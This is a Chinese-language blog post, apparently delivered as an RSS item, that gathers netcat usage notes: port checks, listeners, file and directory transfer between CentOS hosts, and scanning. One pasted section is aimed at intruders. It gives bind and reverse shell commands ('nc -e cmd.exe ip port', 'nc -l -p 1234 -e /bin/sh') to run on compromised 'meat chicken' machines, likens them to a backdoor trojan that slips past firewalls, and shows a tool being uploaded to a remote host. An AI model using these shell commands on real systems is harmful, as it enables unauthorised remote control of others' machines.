<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[向东博客 专注WEB应用 构架之美 --- 构架之美，在于尽态极妍 | 应用之美，在于药到病除]]></title> 
<link>https://jackxiang.com/index.php</link> 
<description><![CDATA[赢在IT，Playin' with IT,Focus on Killer Application,Marketing Meets Technology.]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[向东博客 专注WEB应用 构架之美 --- 构架之美，在于尽态极妍 | 应用之美，在于药到病除]]></copyright>
<item>
<link>https://jackxiang.com/post//</link>
<title><![CDATA[[实践OK]nc测试网络基础运维是否真的开通了443端口，Linux Shell终端端口监听用NC监听端口/端口侦听传输拷贝文件，实现负载均衡测试之目的。]]></title> 
<author>jack &lt;xdy108@126.com&gt;</author>
<category><![CDATA[WEB2.0]]></category>
<pubDate>Wed, 29 Sep 2010 08:38:35 +0000</pubDate> 
<guid>https://jackxiang.com/post//</guid> 
<description>
<![CDATA[ 
	nc -z&nbsp;&nbsp;-w 10&nbsp;&nbsp;%IP%&nbsp;&nbsp;&nbsp;&nbsp;%PORT%<br/><textarea name="code" class="php" rows="15" cols="100">
Egg:
nc -z -w 2 10.70.71.108 80
Connection to 10.70.71.108 80 port [tcp/http] succeeded!
nc -z -w 2 10.70.71.108 443
-z表示检测或者扫描端口
-w表示超时时间
</textarea><br/><br/>拷贝文件看这儿：<br/>[实践OK]linux nc命令传输文件(远程复制文件，传文件。)，linux快速复制大量小文件方法 nc+tar。 https://jackxiang.com/post/9566/<br/>================================================================================<br/><textarea name="code" class="php" rows="15" cols="100">
前提是这个NC，不是这个NC哟，否则命令失效,不同的CentOS6.x/7.x的nc版本的RPM包名还不一样，如下所示:
man nc
nc -l -p &lt;port&gt; 这个命令对于Linux CentOS的nc-1.84这个包的命令参数不是这样的，而是这样：nc -l 4444 &gt;&nbsp;&nbsp;config.py，实践也是和ncat -l&nbsp;&nbsp;-p 4444 &gt;&nbsp;&nbsp;config.py ，一样的可以传文件的，只是参数不一样罢了。
前提是这个NC，不是这个NC哟，否则命令失效（非此nc:rpm -qf /usr/bin/nc nc-1.84-24.el6.x86_64）:
得是这个nc，否则nc -l -p会没法建立起侦听端口，会提示命令行参数有误: rpm -qf /bin/nc nmap-ncat-6.40-7.el7.x86_64 
也就是说：
一）CentOS6.X想要侦听一个端口，得用nmap的RPM包，而简单的nc简单连接命令则要用nc-1.84。
二）CentOS7想要侦听一个端口或nc简单连接命令用一个nmap-ncat的RPM包就Ok了。
CentOS6.X:
 yum -y install nmap @centOS6.X:
rpm -ql nmap
/usr/bin/ncat
/usr/bin/ndiff
/usr/bin/nmap
/usr/bin/nping

yum -y install nmap-ncat @@centOS6.X:
无此包！

使用：ncat&nbsp;&nbsp;-l -n 4444 &gt; a.txt
CentOS7.X:（nmap是没有ncat的，ncat而是放在包：nmap-ncat里的。）
rpm -qpl nmap-6.40-7.el7.x86_64.rpm @centOS7.X:
/usr/bin/ndiff
/usr/bin/nmap
/usr/bin/nping

rpm -ql nmap-ncat&nbsp;&nbsp;@centOS7.X:
/usr/bin/nc
/usr/bin/ncat
 三）经实践尽管操作系统版本不同其RPM包不同，但CentOS6/7之前一个开端口一个传均无问题：
（1）CentOS6.X向CentOS6.X传文件OK：
ncat -l -p 4444 &gt; config.py&nbsp;&nbsp;@CentOS6.X
nc 10.71.182.17* 4444 &lt; config.py&nbsp;&nbsp; @CentOS6.X

（2）CentOS6.X向CentOS7.X传文件OK：
ncat -l -p 4444 &gt; config.py&nbsp;&nbsp;@CentOS7.X
nc 10.71.182.17* 4444 &lt; config.py&nbsp;&nbsp; @CentOS6.X

（3）CentOS7.X向CentOS6.X传文件OK：
ncat -l -p 4444 &gt; config.py&nbsp;&nbsp;@CentOS6.X
nc 10.71.182.17* 4444 &lt; config.py&nbsp;&nbsp; @CentOS7.X
</textarea><br/><br/>一、先侦听端口：<br/>nc -l 443 <br/>GET / HTTP/1.1<br/>Host: 115.182.218.98:443<br/>User-Agent: curl/7.49.1<br/>Accept: */*<br/><br/>二、再在Windows下面用Git的bashshell下Curl访问：<br/> curl &quot;115.182.21*.108:443&quot;<br/>&nbsp;&nbsp;% Total&nbsp;&nbsp;&nbsp;&nbsp;% Received % Xferd&nbsp;&nbsp;Average Speed&nbsp;&nbsp; Time&nbsp;&nbsp;&nbsp;&nbsp;Time&nbsp;&nbsp;&nbsp;&nbsp; Time&nbsp;&nbsp;Current<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Dload&nbsp;&nbsp;Upload&nbsp;&nbsp; Total&nbsp;&nbsp; Spent&nbsp;&nbsp;&nbsp;&nbsp;Left&nbsp;&nbsp;Speed<br/>&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0 --:--:--&nbsp;&nbsp;0:00:03 --:--:--&nbsp;&nbsp;&nbsp;&nbsp; 0<br/>一步里面就用的GET头产生，nc就会立即退出。<br/><br/>=================================================<br/><br/><div class="code"><br/>nc -lk 9503&nbsp;&nbsp;<br/></div><br/>Linux可以使用nc命令来测试网络端口是否正常，类似于telnet命令，但也可以用nc命令来监听本地端口，支持TCP、UDP协议，当我们测试NTP服务网络策略是否正常时，可以使用到nc命令测试UDP 123端口。<br/><br/>使用案例如下：<br/><br/>1、测试TCP端口<br/><br/>nc -vz ip tcp-port<br/><br/>2、测试UDP<br/><br/>nc -uvz ip udp-port<br/><br/>3、临时监听TCP端口<br/><br/>nc -l port<br/><br/>4、永久监听TCP端口<br/><br/>nc -lk port<br/><br/>5、临时监听UDP<br/><br/>nc -lu port<br/><br/>6、永久监听UDP<br/><br/>nc -luk port<br/><br/>说明：默认监听的都是TCP端口<br/>来自：https://baohua.me/operating-system/linux/linux-use-mc-command-permanent-listen-local-port/<br/>&nbsp;&nbsp;这个很简单，监听80端口如果机器上运行这个命令，端口80被认为是开放的，可以欺骗很多扫描器的哦！ <br/><div class="code">nc -l -p 80 &gt; e:/log.dat</div><br/><br/>l Linux本地机模式<br/>　　Linux应用程序可以通过远程加载在NC本地运行，服务器提供文件存储。随着知识产权保护的强化采用Linux应用软件将使软件成本大大降低。打印可由网络或本地支持。<br/>下载地址：http://www.eee110.com/Software/Catalog139/169.html<br/>命令1：监听命令<br/>nc -l -p port<br/>nc -l -p port &gt; e:/log.dat<br/>nc -l -v -p port<br/>参数解释：<br/>-l：监听端口，监听入站信息<br/>-p：后跟本地端口号<br/>-v：显示端口的信息，如果使用-vv的话，则会显示端口更详细的信息<br/>提示：一般大家都爱用-vv<br/>nc -l -p 80<br/>这个很简单，监听80端口<br/>如果机器上运行这个命令，端口80被认为是开放的，可以欺骗很多扫描器的哦！<br/>nc -l -p 80 &gt; e:/log.dat<br/>呵呵，功能和上边一样，但是后边加了个“&gt; e:/log.dat”我想，学过ECHO<br/>那个命令的人都会知道吧，是在E盘创建一个log.dat的日志文件<br/>nc -l -v -p 80<br/>和上边命令相似，不过这次不是记录在文件里，而是会直接显示在运行着NC<br/>的屏幕上。<br/>nc -l -v -p 80<br/>然后在浏览器中输入本机IP：127.0.0.1<br/>同样，上边两个也是一样，大家自己试验一下吧<br/>命令2：程序定向<br/>nc -l -p port -t -e cmd.exe<br/>本地机： nc -l -p port 或 nc -l -v -p port<br/>目标机：nc -e cmd.exe ip port<br/>参数解释：<br/>-l、-p两个参数已经解释过了<br/>-e；作用就是程序定向<br/>-t：以telnet的形式来应答<br/>例子<br/>nc -l -p 5277 -t -e cmd.exe<br/>知道运行在哪里吗？千万不要运行在自己的机器上，如果运行了，你机器<br/>就会变成一台TELNET的服务器了，呵呵，解释一下：监听本地端口5277的<br/>入站信息，同时将CMD.exe这个程序，重定向到端口5277上，当有人连接的时候，就让程序CMD.exe以TELNET的形式来响应连接要求。<br/>说白了，其实就是让他成为一台TELNET的肉鸡，所以这个命令要运行在你的肉鸡上。。<br/>呵呵，咱们来找台肉鸡试试，我TELNET IP 5277<br/>local machine：nc -l -p port ( or nc -l -v -p port )<br/>remote machine：nc -e cmd.exe ip port<br/>大家知道灰鸽子和神偷吧，这两款工具都是利用了反弹端口型的木马，<br/>什么叫反弹端口？就是说，当对方中马后，不用你主动和对方连接，也就是说<br/>不用从你的client端向对方主机上运行的server端发送请求连接，而是对方主动来连接你<br/>这样就可以使很多防火墙失效，因为很多防火墙都不检查出站请求的。<br/>这里这两个命令结合在一起后，于那两款木马可以说有异曲同工之效。为什么？<br/>咳！！听我给你讲啊！！（先交100000000RMB学费)哇，别杀我啊！！)<br/>nc -l -p 5277 （坚听本地5277端口）<br/>同样也可以用<br/>nc -l -v -p 5277<br/>运行在本地<br/>然后在远程机器上，想办法运行<br/>nc -e cmd.exe ip 5277<br/>（你可别真的打“ip”在肉机上啊）要打，xxx.xxx.xxx.xxx这样！！<br/>呵，看看在本地机器上出现了什么？<br/>这样就是反弹~~在本地机器上得到了一个SHELL<br/>命令3：扫描端口<br/>nc -v ip port<br/>nc -v -z ip port-port<br/>nc -v -z -u ip port-port<br/>参数解释：<br/>-z：将输入输出关掉，在扫描时使用<br/>nc -v ip port<br/>这个命令是针对某一个端口进行扫描<br/>例如：<br/>nc -v ip 135<br/>扫描远程主机的135端口，这样获得了该端口的一些简单信息，但是针对某些端口，我们还可以获得更多的信息<br/>例如：80端口<br/>我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息<br/>nc -v -z ip port-port<br/>这个命令是用来扫描的一个命令，这个命令用于快速扫描TCP端口，而port-port则是指定了扫描的端口范围<br/>例如：<br/>nc -v -z ip 1-200<br/>可以看到我机器上的1-200的TCP端口的开放情况<br/>nc -v -z -u ip port-port<br/>这个命令比上个命令多了个-u，这个命令的作用仍然是扫描端口，只是多了一个-u的参数，是用来扫UDP端口的<br/>例如：<br/>nc -v -z -u ip 1-200<br/>这个命令就会扫1-200的UDP端口<br/>命令4：传送文件（HOHO，I LIKE）<br/>LOCAL MACHINE：nc -v -n ip port &lt; x:/svr.exe<br/>REMOTE MACHINE：nc -v -l -p port &gt; y:/svr.exe<br/>参数解释：<br/>-n：指定数字的IP地址<br/>这两个命令结合起来是用来传送文件的<br/>首先，在远程机上运行命令：<br/>nc -v -l -p 5277 &gt; c:/pulist.exe<br/>这个命令还记的吗？呵呵，是不是和监听命令有点类似，对，没错，这个是监听5277端口<br/>并把接受到的信息数据写到c:/pulist.exe中<br/>这时候在本地机上运行<br/>nc -v -n ip 5277 &lt; e:/hack/pulist.exe<br/>这个命令的意思就是，从本地E盘跟目录中读取pulist.exe文件的内容，并把这些数据发送到ip的5277端口上<br/>这样远程主机就会自动创建一个pulist.exe文件 <br/><br/><br/>nc是一个强大的网络工具,可以帮助你诊断,发现在linux下面使用网络时的一些问题.如:telnet,nmap<br/><br/>nc可以提供如下的网络功能:<br/>1) 监听特定端口,这时候nc就可以作为一个服务器,但是我发现这样使用nc生成的服务器仅仅是一个echo服务器而已,没有其他更加强大的功能.<br/>2) 连接特定端口,这时候nc就成为了一个客户端,同样的,也是一个简单的客户端,只能起echo的作用.<br/>3) 扫描端口,这可以作为查询某个机器上是否开启了某个端口.<br/><br/>具体nc的使用可以man nc查看,这里仅就上面的几个功能进行说明.<br/>1)使用-l参数监听端口,我的理解是listen的缩写,因此在指定-l参数和一个端口号的时候,nc开始监听这个端口的连接.<br/><br/>2) 使用ip地址(或者URL)以及服务器端口号变成一个客户端连接特定的服务器,如 nc 127.0.0.1 80就是连接本地localhost的80端口,在连接成功之后后面的输入就可以作为这个客户端向服务器发出的请求数据,可以是http请求等等.通常情况下,为了免去重复输入的麻烦,可以把输入写在一个文件里面,然后通过shell中重定向的功能向服务器发送请求,比如,假设http.txt文件中是已经写好的http请求, 可以采用命令 cat http.txt &#124; nc 127.0.0.1 80发送这个请求.<br/><br/>3)使用-z参数扫描端口,后面紧跟的是ip地址(或者URL),以及一个端口号的范围,比如nc -z 127.0.0.1 20-40命令扫描localhost的20到40端口是否开启.<br/><br/>其它的使用,nc不仅可以建立TCP连接,还可以建立IPV6协议的连接(-6参数),或者IPV4协议(-4参数),或者UDP(-u参数).<br/><br/><br/>nc 传输文件<br/><br/>既然nc 是TCP/IP 协议的网络连接，可以用nc 建立连接来传输文件<br/>&nbsp;&nbsp;&nbsp;&nbsp;传输文件方把文件内容写到nc 开启的端口listen中<br/>&nbsp;&nbsp;&nbsp;&nbsp;cat rpyc.py &#124;nc -l 33333&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp; 接收文件方，nc 连接传输文件机器的listen 端口，并把文件接收写入指定文件中<br/>&nbsp;&nbsp;&nbsp;&nbsp;nc 10.246.46.15&nbsp;&nbsp;33333 &gt; rpyc.py&nbsp;&nbsp;<br/><br/>suse enterprise 10 sp2是 nc6，不是nc。<br/><br/>远程拷贝文件<br/>从server1拷贝文件到server2上。需要先在server2上，，用nc激活监听，<br/>server2上运行： nc -l 1234 &gt; text.txt<br/>server1上运行： nc 192.168.10.11 1234 &lt; text.txt<br/>注：server2上的监听要先打开<br/><br/><br/>==================运维小工具系列之nc、nmap=====================<br/>先说nc吧，网络通信小工具，咳咳。也就是通过tcp、udp传输数据啦<br/><br/>案例1:传文件<br/><br/>直接打码吧：<br/><br/>服务器一执行：nc -l 1234 &gt; file.txt<br/><br/>服务器二执行：nc 服务器一ip 1234 &gt; file.txt<br/><br/><br/><br/>案例2：传目录<br/><br/>什么？又是传输。。看清楚好不，这是传目录<br/><br/>服务器一执行：nc -l 1234&#124;tar xzvf -<br/><br/>服务器而执行：tar czvf - xx目录 &#124;nc 服务器一ip 1234<br/><br/>调调的有木有，就空中是打了包的，落地自动解压。cool~<br/><br/>注意下里边的“-”就行<br/><br/><br/><br/>案例3：扫描端口<br/><br/>额，还是nmap出马吧，你用nc运维gg估计会笑话你了<br/><br/><br/><br/>案例4：反向shell<br/><br/>这个别乱玩，咳咳。<br/><br/>服务器一：nc -l -p 1234 -e /bin/sh<br/><br/>服务器二：nc 服务器一ip 1234<br/><br/>神奇的像ssh一般，关键是不用输入xxx，嘿嘿黑黑
]]>
</description>
</item><item>
<link>https://jackxiang.com/post//#blogcomment</link>
<title><![CDATA[[评论] [实践OK]nc测试网络基础运维是否真的开通了443端口，Linux Shell终端端口监听用NC监听端口/端口侦听传输拷贝文件，实现负载均衡测试之目的。]]></title> 
<author> &lt;user@domain.com&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> 
<guid>https://jackxiang.com/post//#blogcomment</guid> 
<description>
<![CDATA[ 
	
]]>
</description>
</item>
</channel>
</rss>